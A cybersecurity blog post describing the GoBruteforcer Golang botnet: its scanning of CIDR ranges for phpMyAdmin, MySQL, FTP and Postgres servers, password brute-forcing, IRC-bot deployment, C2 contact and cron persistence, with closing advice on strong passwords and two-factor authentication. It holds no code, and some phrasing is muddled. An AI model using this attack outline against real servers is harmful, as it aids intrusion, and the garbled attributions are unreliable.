Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label GoBruteforcer. Show all posts

GOBruteforcer: an Active Web Server Harvester

 


Known as Golang, the Go programming language is relatively new. It is one of the most popular malware programmers interested in creating malware. Capable of developing all kinds of malware, such as ransomware, stealers, or remote access Trojans (RATs), it has proven to be a versatile platform that can deal with all kinds of malware. Golang-based botnets appear particularly attractive to attackers to gain access to their networks. 

The GoBruteforcer botnet malware is the latest version of a type of malware written in Golang and targeting web servers. This is specifically for those running PHPMyAdmin, MySQL, FTP, and Postgres database software. 

How GoBruteforcer Works?

Palo Alto Network's GoBruteforcer is compatible with more than one processor architecture, such as x86, x64, and ARM architectures. 

During the actual execution of the malicious code, some special conditions need to be met, such as the use of specific arguments during the execution process. Additionally, it relies on the installation of targeted services with weak passwords, which are already installed on the system. Whenever these conditions are met, it executes only if it satisfies all of the requirements. 

  • With the help of weak passwords, this malware aspires to gain access to vulnerable Unix-like platforms (commonly known as UNIX). 
  • To begin the attack, a scan is conducted for possible targets that have MySQL, Postgres, FTP, or PHPMyAdmin running on their servers. 
Expansion of Networks 

The software's source code has been updated to include a multi-scan module that can scan and find a much greater set of potential targets than before.
  • A Classless Inter-Domain Routing (CIDR) block was used by GoBruteforcer at the time of the attack to scan the network for vulnerabilities. A CIDR is a format of IP address ranges contained in a single network containing multiple IP addresses. A single IP address does not provide a huge range of targets for infiltration, unlike a range of IP addresses that are used for intrusion.
  • The application detects a host by scanning the network for any ports that have become open over time belonging to the aforementioned services when it finds the host. A brute-force attack is used to attempt to gain access to that machine. 
Aspects of the Postinfection Period

  • When GoBruteforcer is successful in detecting the intrusion, it deploys an IRC bot that collects the URL of the attacker for further use. 
  • Then it communicates with the C2 server and waits for the attacker to send it any further directives. 
  • A cron job is used to store the registration information for the IRC bot, which is used as a means of persistence. 
Using GoBruteforcer's multiscan feature, operators can use the tool to scan a wide range of devices across different networks all at once. 

As long as default passwords are changed and a strong password policy is implemented including two-factor authentication, you can significantly reduce the risks of attacks caused by brute force method.

Threat actors have always been attracted to targeting web servers due to their lucrative nature. An organization's web servers are an integral part of its operations, so allowing weak passwords to be used could lead to serious security threats. Weak (or default) passwords are more likely to be exploited by malware including GoBruteforcer. 

The GoBruteforcer bot has the capability of scanning multiple targets at once, allowing it to get into a wide range of networks, and this is what helps it to be able to do the job. Furthermore, GoBruteforcer seems to be actively being developed. Therefore, attackers are likely to change their strategies soon if they hope to target web servers with this tool.